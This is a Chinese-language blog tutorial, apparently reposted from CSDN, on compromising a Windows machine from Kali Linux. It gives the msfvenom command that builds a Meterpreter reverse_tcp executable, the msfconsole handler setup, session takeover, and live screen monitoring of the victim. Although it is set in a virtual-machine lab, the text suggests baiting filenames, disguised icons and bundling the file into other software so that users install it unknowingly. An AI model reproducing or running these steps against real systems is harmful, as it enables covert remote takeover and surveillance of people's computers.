kali渗透Windows

目录

一、前提:

二、过程:

1、进入管理员模式:

 2.生成可执行文件

3.运行msfconsole命令

4.配置参数

 5.在靶机打开可执行文件

6.查看用户

7.监控靶机电脑屏幕


一、前提:

安装虚拟机,在虚拟机安装Windows系统和kali系统。

软件:msfvenommsfconsole(Kali系统内置)

二、过程:

1、进入管理员模式:

sudo su

 执行命令之后输入Kali的密码,密码是被隐藏的,直接输入然后回车即可

 

 2.生成可执行文件

命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本地ip> LPORT=<本地端口号> –f exe –o <文件名>.exe

解释: 本地ip写自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址

本地端口自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就行。

文件名可以随便写自己喜欢的名字。可以写个容易让目标主机上钩的名字。

当然MSF也可以用来渗透手机、mac、Linux等

这个就是Kali主机的IP地址

接下来运行命令生成文件

默认生成的文件在根目录下

 把刚才生成的文件放到目标靶机Win10系统中

3.运行msfconsole命令

命令:

msfconsole

 

4.配置参数

(1)命令: use exploit/multi/handler(选择模块)

(2)命令: set payload windows/meterpreter/reverse_tcp(选择攻击模块)

(3)命令: set LhOST 192.168.32.1(填写自己主机的IP地址)

(4)命令: set lport 1111(填写刚才生成文件时的端口号)

(5)命令: show options(查看设置参数)

(6)命令: exploit -z -j(后台执行)

 

 参数设置好之后在靶机打开程序然后执行步骤6的命令,也可以直接输入命令exploit开始攻击

 5.在靶机打开可执行文件

我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面

6.查看用户

(1)命令: sessions(查看上钩的用户)

(2)命令: sessions -i 1(选择需要攻击的用户,这里选择第 1 个)

出现meterpreter你就已经成功的入侵的对方的电脑

7.监控靶机电脑屏幕

 命令:

run vnc -i

猜你喜欢

转载自blog.csdn.net/m0_51786204/article/details/129926296